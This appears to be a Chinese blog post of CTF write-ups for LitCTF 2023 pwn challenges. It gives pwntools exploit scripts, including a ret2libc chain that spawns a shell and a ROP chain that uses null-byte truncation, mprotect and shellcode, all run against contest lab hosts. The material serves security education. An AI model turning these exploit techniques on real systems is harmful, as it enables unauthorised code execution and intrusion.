LitCTF-pwn学习

pwn
赛题
发布日期:   2025-06-04

[LitCTF 2023]只需要nc一下~

题目描述:

1
现成的shell nc一下就好了~

nc连接

cat flag试试

ls试一下

查看dockerfile文件

得到假flag

看到这条命令

1
echo $FLAG > /flag.txt

将环境变量 $FLAG 的值输出到 /flag.txt文件中

直接输入

1
echo $FLAG

也可以直接输入环境变量

1
env

最后flag为

1
NSSCTF{9d796fff-8e4c-4927-9b38-1356697b23d6}

[LitCTF 2023]口算题卡

题目描述:

1
来点小学生喜欢的x 不会算错吧?

nc连接

口算题

做完100道加减法题目后就可以得到Flag

直接使用pwntools库进行交互

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
from pwn import *

# 配置连接信息
io = remote('node4.anna.nssctf.cn', 28277)
context(arch='amd64', os='linux', log_level='info')  # 调整日志级别为info

def safe_eval(expression):
    """安全地计算表达式结果,避免使用eval"""
    # 移除所有非数字、运算符和空格的字符
    clean_expr = ''.join(c for c in expression if c.isdigit() or c in '+- ()')
    try:
        return eval(clean_expr)  # 使用清理后的表达式
    except Exception as e:
        log.error(f"表达式计算错误: {expression}")
        log.error(f"错误详情: {e}")
        return None

# 计数器和成功数
count = 0
success = 0

try:
    while True:
        try:
            # 接收题目
            io.recvuntil(b'What is ')
            problem = io.recvline().strip(b'\n?').decode()
            count += 1
            
            log.info(f"题目 {count}: {problem}")
            
            # 计算答案
            answer = safe_eval(problem)
            if answer is None:
                log.warning("无法计算答案,跳过")
                io.sendline(b'0')  # 发送默认值
                continue
            
            # 发送答案
            io.sendline(str(answer).encode())
            success += 1
            
            # 简单的进度提示
            log.success(f"已解答 {success}/{count}")
            
            # 检查是否已完成100题
            if success >= 100:
                log.info("已完成100次计算,尝试获取flag")
                break
                
        except EOFError:
            log.warning("连接意外关闭")
            break
        except Exception as e:
            log.error(f"处理题目时发生错误: {e}")
            # 继续尝试下一题
            continue

    # 尝试接收flag
    flag = io.recvall(timeout=2).decode()
    if "flag" in flag.lower():
        log.success(f"获取到FLAG: {flag}")
    else:
        log.info("未找到flag,尝试交互式模式")
        io.interactive()

except KeyboardInterrupt:
    log.info("用户中断,退出程序")
finally:
    io.close()
    log.info(f"已关闭连接。成功解答: {success}/{count}")

运行得到

最后flag为

1
NSSCTF{b1f7ddfd-0533-4272-af5b-b7f21c018c93}

[LitCTF 2023]狠狠的溢出涅~

ret2libc题目

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
from pwn import *

local = False
context(arch='amd64', os='linux', log_level='debug')
elf = ELF('./pwn4')
libc = ELF('./libc-2.31.so')
if local:
    p = process('./pwn4')
    pwnlib.gdb.attach(p, 'b main')
else:
    p = remote("node4.anna.nssctf.cn", 28908)
p.recvuntil("message:")
ret = 0x400556
rdi = 0x4007d3
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main = 0x4006B0

payload = b'\x00' + b'a'* (0x60 + 7) + p64(rdi) + p64(puts_got) + p64(puts_plt) + p64(main)
p.sendline(payload)
p.recvuntil("Received\n")
addr = u64(p.recvuntil('\x7f').ljust(8, b'\x00'))
log.success("puts real addr: " + hex(addr))

base = addr - libc.sym['puts']
system = base + libc.sym['system']
binsh = base + libc.search(b'/bin/sh').__next__()

payload = b'\x00' + b'a'* (0x60 + 7) + p64(ret) + p64(rdi) + p64(binsh) + p64(system)
p.sendlineafter("message:", payload)
p.interactive()

运行得到

最后flag为

1
NSSCTF{u_r_master_of_stackoverflow_and_intoverflow}

[LitCTF 2023]ezlogin

\x00截断

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
#!/bin/env python3
from pwn import *
context(arch='amd64',terminal=['tmux','splitw','-h'])


#io = process('./pwn4')
io = remote('node5.anna.nssctf.cn',21350)
#gdb.attach(io,'b *0x40061A ')
pattern = b'a'*0x108
rax = 0x00000000004005af
syscall = 0x4884F5 
rdi = 0x0000000000400706
rsi = 0x0000000000410043
rdx = 0x0000000000448c95
sh = 0x4A49C0+0xc
buf = 0x006b6010
lret = 0x0000000000475b22
rbp = 0x0000000000400b18
crbx = 0x00000000004009ad
jrax = 0x0000000000400b11
mprotect = 0x449A80
reads = 0x448C80
def sendpayload(payloads):
    io.recvuntil(b'Input your password:')
    io.send(payloads)

def encsend(data:bytes):
    encdata = data.replace(b'\x00',b'\xff')
    idx = len(data) - 1
    while 1:
        if encdata[idx] == 255:
            sendpayload(encdata[:idx-len(data)]+b'\x00')
        if idx == 1:
            return
        idx = idx - 1



payload = flat([pattern,rdi,0,rsi,buf,syscall,rbp,buf-0x8,lret])
encsend(payload)
sendpayload(b'PASSWORD\x00')
pause()
payload = flat([rdi,buf-0x10,rsi,0xc00,rdx,7,mprotect,rdi,0,rsi,buf+0x100,rdx,0x100,rax,0,reads,rax,buf+0x100,jrax])
io.send(payload)
pause()
io.send(asm(shellcraft.sh()))
io.interactive()

运行得到

最后flag为

1
NSSCTF{dsadsdgwr34142dcsar3211}
文章作者: yiqing
文章链接: http://yiqing.asia/posts/198200.html
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 yiqing !
pwn
  目录